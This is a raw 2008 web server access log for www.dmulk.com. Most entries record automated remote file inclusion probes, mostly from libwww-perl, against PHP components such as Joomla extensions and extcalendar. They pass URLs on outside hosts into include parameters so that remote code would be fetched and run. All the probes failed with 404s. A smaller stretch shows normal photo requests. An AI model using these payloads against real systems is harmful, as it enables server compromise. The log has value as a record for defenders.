80.253.99.164 - - [23/Mar/2008:07:07:57 -0700] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.200 - - [23/Mar/2008:07:08:17 -0700] "GET /index.php?option=com_restaurant&Itemid=&mosConfig_absolute_path=http://www.lieblingshomepage.de/feedbackservice//smile-i.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.147.134.7 - - [23/Mar/2008:07:09:04 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.36.241.244 - - [23/Mar/2008:07:09:40 -0700] "GET /logs/access_080117.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.241.244 - - [23/Mar/2008:07:09:41 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.237.162 - - [23/Mar/2008:07:10:15 -0700] "GET /errors.php?error=http://www.over18.org.uk/test??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
70.84.237.162 - - [23/Mar/2008:07:10:15 -0700] "GET /logs/errors.php?error=http://www.over18.org.uk/test??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:10:23 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:10:33 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:11:00 -0700] "GET /logs/access_080204.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:11:00 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:11:00 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [23/Mar/2008:07:11:35 -0700] "GET /logs/access_080117.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.2.130 - - [23/Mar/2008:07:11:36 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [23/Mar/2008:07:11:59 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
208.186.169.183 - - [23/Mar/2008:07:11:59 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.36.241.244 - - [23/Mar/2008:07:12:00 -0700] "GET /logs/access.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:12:07 -0700] "GET /logs/access_071231.log/modifyform.html?code=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:12:07 -0700] "GET /modifyform.html?code=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:12:09 -0700] "GET /logs/modifyform.html?code=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:07:12:11 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://contactcraze.com/beast-test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
64.141.102.13 - - [23/Mar/2008:07:12:11 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://contactcraze.com/beast-test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
77.221.130.15 - - [23/Mar/2008:07:12:15 -0700] "GET //atom.php5?page=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:07:12:26 -0700] "GET /logs/access_080312.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
221.143.48.95 - - [23/Mar/2008:07:12:35 -0700] "GET /logs/access_080101.log/modifyform.html?code=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.247 - - [23/Mar/2008:07:12:46 -0700] "GET /logs/access_080204.log/index2.php?x=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:07:13:27 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.235.74 - - [23/Mar/2008:07:13:42 -0700] "GET /logs/access_080117.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [23/Mar/2008:07:13:42 -0700] "GET /logs/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:13:53 -0700] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:13:54 -0700] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:13:54 -0700] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.2.130 - - [23/Mar/2008:07:14:14 -0700] "GET /logs/access.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.162.215.10 - - [23/Mar/2008:07:14:15 -0700] "GET /logs/access_080312.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:07:14:28 -0700] "GET /logs/access_080216.log/main.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:07:14:29 -0700] "GET /main.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:07:14:29 -0700] "GET /logs/main.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:14:31 -0700] "GET /logs/access_080204.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:14:31 -0700] "GET /logs/access_080204.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:14:31 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:14:31 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:14:31 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:14:31 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
190.1.0.16 - - [23/Mar/2008:07:14:51 -0700] "GET /logs/access_080228.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.1.0.16 - - [23/Mar/2008:07:14:52 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.190.202.154 - - [23/Mar/2008:07:14:52 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
80.190.202.154 - - [23/Mar/2008:07:14:53 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://emredijital.com.tr/administrator/components/com_remository/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
72.36.235.74 - - [23/Mar/2008:07:15:09 -0700] "GET /logs/access.log/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [23/Mar/2008:07:15:12 -0700] "GET /logs/access_080131.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:07:15:18 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.253.159 - - [23/Mar/2008:07:15:19 -0700] "GET /logs/access_080127.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:32 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:32 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:32 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:33 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:34 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:34 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
195.137.139.73 - - [23/Mar/2008:07:15:34 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:35 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:07:15:35 -0700] "GET /logs/access_080306.log/files/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:07:15:36 -0700] "GET /files/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:36 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:07:15:36 -0700] "GET /logs/files/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:37 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:37 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:37 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:38 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:38 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:38 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:39 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:39 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:40 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:42 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:42 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:15:44 -0700] "GET /logs/access_080204.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:15:44 -0700] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:15:44 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:45 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:46 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
68.220.76.49 - - [23/Mar/2008:07:15:46 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.dmulk.com"
65.55.209.206 - - [23/Mar/2008:07:15:53 -0700] "GET /presto/?N=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
222.122.43.28 - - [23/Mar/2008:07:16:05 -0700] "GET /logs/access_080215.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.jegonet.com/janghak/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:07:17:11 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:07:17:11 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.137.24 - - [23/Mar/2008:07:17:12 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.76 - - [23/Mar/2008:07:18:13 -0700] "GET /logs/access_080210.log/skins/advanced/advanced1.php?pluginpath[0]=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.239.121.190 - - [23/Mar/2008:07:18:34 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://erwinedillon.com/cvstaff/paypal/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.143.186.32 - - [23/Mar/2008:07:18:34 -0700] "GET /logs/access_080223.log/files/errors.php?error=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.1.0.16 - - [23/Mar/2008:07:18:51 -0700] "GET /logs/access_080122.log/errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.1.0.16 - - [23/Mar/2008:07:18:52 -0700] "GET /logs/errors.php?error=http://www.idowebhosting.net/catalog/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:19:09 -0700] "GET /logs/access_080131.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:19:09 -0700] "GET /logs/access_080131.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.248.73 - - [23/Mar/2008:07:19:13 -0700] "GET /logs/access_080131.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=SHELL%20CMD???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:07:19:29 -0700] "GET /logs/access_080131.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.110.209.230 - - [23/Mar/2008:07:19:30 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.sdmetal.org/prod//modules/SPChat/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
